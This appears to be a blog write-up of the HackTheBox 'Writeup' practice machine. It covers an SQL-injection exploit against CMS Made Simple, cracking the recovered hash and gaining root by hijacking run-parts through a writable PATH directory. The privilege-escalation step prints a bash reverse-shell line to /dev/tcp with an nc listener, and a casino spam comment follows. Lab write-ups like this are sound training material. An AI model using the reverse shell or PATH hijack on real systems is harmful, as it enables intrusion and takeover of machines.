Wednesday, December 30, 2020

Home » , , , , , » Hackthebox Writeup

Hackthebox Writeup




User

As always, I started with an nmap scan which revealed two ports open, port 22 (SSH) and port 80 (HTTP).


Visiting port 80 showed a very simple page and nothing else. No links, nothing. Well, except for a warning that I’d be banned if I hit a lot of 404 pages, so no gobuster or similar brute forcing was going to work here.


Fortunately, checking robots.txt gave me something to work on, as it didn’t want me to visit /writeup. Which is exactly what I did!
There wasn’t much of interest in /writeup, but wappalyzer (a Firefox plugin) identified the software running as ‘CMS Made Simple’. Something which exploit-db has several exploits for.
I found an SQL injection exploit which didn’t need any valid credentials, and since I wasn’t able to identify the version of CMS Made Simple running, I decided to give it a try.
[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7
Within a short time the exploit had extracted a username, and the salt and hash for the password. Using hashcat with mode 20 (md5($salt.$pass)) I got the password ‘raykayjay9’ which allowed me to log in via SSH and grab the user flag.

root

For root, I did the usual and fetched LinEnum and pspy and ran them. I didn’t initially notice anything with these tools, so I ran pspy with the parameters -fp to see all file system events.
When someone ssh’d into the box, sshd would call run-parts without a specific path, looking in the following dirs in the PATH variable:

PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
Checking if any of these directories were writable showed that both /usr/local/sbin and /usr/local/bin were. So what would happen if I were to put an executable script called ‘run-parts’ into either of the above dirs?
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.10/9001 0>&1
Running chmod +x to make the above script executable and starting a reverse netcat listener

nc -lvnp 9001
All I had to do was log in via SSH again, and I had a reverse root shell and could grab the root flag!

Share:

1 comment:

  1. UnknownApril 10, 2022 at 7:50 AM

    Merkur 15c Safety Razor - Barber Pole - Deccasino
    Merkur worrione 15C Safety 1xbet app Razor - Merkur - 15C for deccasino Barber Pole is the perfect introduction to jancasino the Merkur Safety https://septcasino.com/review/merit-casino/ Razor.

    ReplyDelete

  • WEBSHELL BACKDOOR CODE IN IMAGE FILES
    STEGANOGRAPHY APPLIED FOR WEB EXPLOITATION Before starting, let's introduce or refresh a couple of concepts that will come useful in ord...
  • Fuzzy HackTheBox WEB (Test)
    Welcome Readers, Today we will be doing the hack the box (HTB) challenge Finding the Page We have this nice website in front of us.. Let’s s...
  • Nmap' scripts categories - full potential unleashed
    I know that almost all of you may already know that Nmap provides the use of scripts for doing analysis of the target. Many of us just add t...
  • linux cheat sheet
    Everyone knows: cheat sheets are cool! They are very useful if you already know the basics about a topic but you have to look up details whe...
  • Magic Hackthebox
      Welcome Readers, Today we will be doing the hack the box (HTB) challenge Enumeration Starting off with a little nmap, we see SSH and HTTP ...
  • Hackthebox Writeup
    User As always, I started with an nmap scan which revealed two ports open, port 22 (SSH) and port 80 (HTTP). Visiting port 80 showed a very ...

Contact us

Name

Email *

Message *

Theme Support